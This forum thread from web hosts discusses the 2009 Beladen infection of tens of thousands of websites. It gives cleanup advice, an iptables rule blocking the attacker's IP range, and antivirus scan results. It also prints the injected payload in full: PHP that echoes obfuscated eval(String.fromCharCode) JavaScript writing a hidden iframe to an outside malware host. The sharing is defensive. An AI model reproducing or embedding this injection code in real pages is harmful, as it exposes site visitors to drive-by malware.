apirateslife
Active Member
More than 40,000 websites have fallen victim to a virus attack that is still growing, security experts have said.
Security firm Websense says the site beladen.net is infecting legitimate websites all over the world with malicious code that then tries to install malware on the computers of people visiting them.
The Beladen virus is still active, with the number of affected sites growing from 20,000 to over 40,000 since Friday.
Carl Leonard, security research manager for EMEA at Websense, said the Beladen virus poses a "pretty serious" threat to users.
"We are trying to look into how these sites are compromised in the first place," he said. Anti-virus detection capability is also not that high, with 13 out of 40 systems tested by Websense failing to detect the malware.
Code:
http://www.computerweekly.com/Articles/2009/06/03/236279/over-40000-sites-infected-by-growing-beladen-virus.htm
After I learned my clients website was infected. I suspended the account and removed the malicious code from the index files, changed the hosting account password, and advised my client to scan his computer for viruses with Avira Premium Security.
Here is the Malicious code the virus embeds into the files:
Code:
<?php echo ''; ?><?php echo ''; ?><?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97,114,32,106,104,113,119,61,49,50,51,49,49,49,51,43,50,53,59,118,97,114,32,103,104,103,52,53,61,34,107,97,114,34,59,118,97,114,32,119,61,34,108,97,115,116,34,59,118,97,114,32,114,101,54,61,34,46,34,59,118,97,114,32,104,50,104,61,34,99,111,109,34,59,118,97,114,32,97,61,34,105,102,114,34,59,118,97,114,32,115,61,34,104,116,116,34,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,39,43,97,43,39,97,109,101,32,115,114,39,43,39,99,61,34,39,43,115,43,39,112,58,47,47,39,43,103,104,103,52,53,43,39,39,43,119,43,39,39,43,114,101,54,43,39,39,43,104,50,104,43,39,47,39,43,39,34,32,119,105,100,39,43,39,116,104,61,34,49,34,32,104,39,43,39,101,105,103,104,116,61,34,51,34,62,60,47,105,102,39,43,39,114,39,43,39,97,109,101,62,39,41,59,32,102,117,110,99,116,105,111,110,32,103,103,54,51,52,53,40,41,123,118,97,114,32,97,115,51,49,49,51,61,57,43,55,53,52,52,59,125,32,118,97,114,32,109,110,98,113,61,52,51,48,52,49,56,50,52))</script>'; ?>
There have been numerous reports on both the DirectAdmin and cPanel forums.
Code:
http://www.directadmin.com/forum/showthread.php?p=157823
http://forums.cpanel.net/general/62821-iframe-javascript-hacks-35.html
We have seen lots of this as well and EVERY TIME the cause has been traced to a virus on the user's machine that was either stealing their ftp credentials from their stored passwords or (more likely) sniffing their username and password during an ftp session since ftp in a cleartext protocol. The virus would either then "phone home" or fire up it's own ftp connection and dl all .htm, .html and .php files from the user's account, add it's iframe or js code and reupload.
Just changing the ftp password makes no difference since the new password it compromised the very next time they make a connection (usually to fix their pages).
The only relief was to make sure their machine is virus free, and change passwords. As an addition, we also educate them to the advantages of using sftp instead of ftp and also point out that the same hijacking can occur with email passwords if they don't use encryption there too.
Code:
http://www.directadmin.com/forum/showpost.php?p=158146&postcount=22
Code:
91.212.65.147
Code:
http://whois.domaintools.com/91.212.65.0
Code:
http://www.avira.com/en/downloads/avira_premium_security_suite.html
Code:
91.212.65.0/24
Code:
iptables -I INPUT -s 91.212.65.0/24 -j DROP
Code:
--> ./tmp/webalizerftp/index.html
[DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./tmp/webalizer/domain.com/index.html
[DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./tmp/webalizer/index.html
[DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./tmp/webalizer/domain.com/index.html
[DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./tmp/webalizer/domain.com/index.html
[DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/ips_kernel/index.html
[DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/converge_local/index.html
[DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/public/index.html
[DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/uploads/index.html
[DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/interface/index.html
[DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
--> ./public_html/sandbox/cache/index.html
[DETECTION] Contains recognition pattern of the HTML/Crypted.Gen HTML script virus
My friend reported that a website on Katz tried to force him to download a PDF document. So don't download any magical PDF documents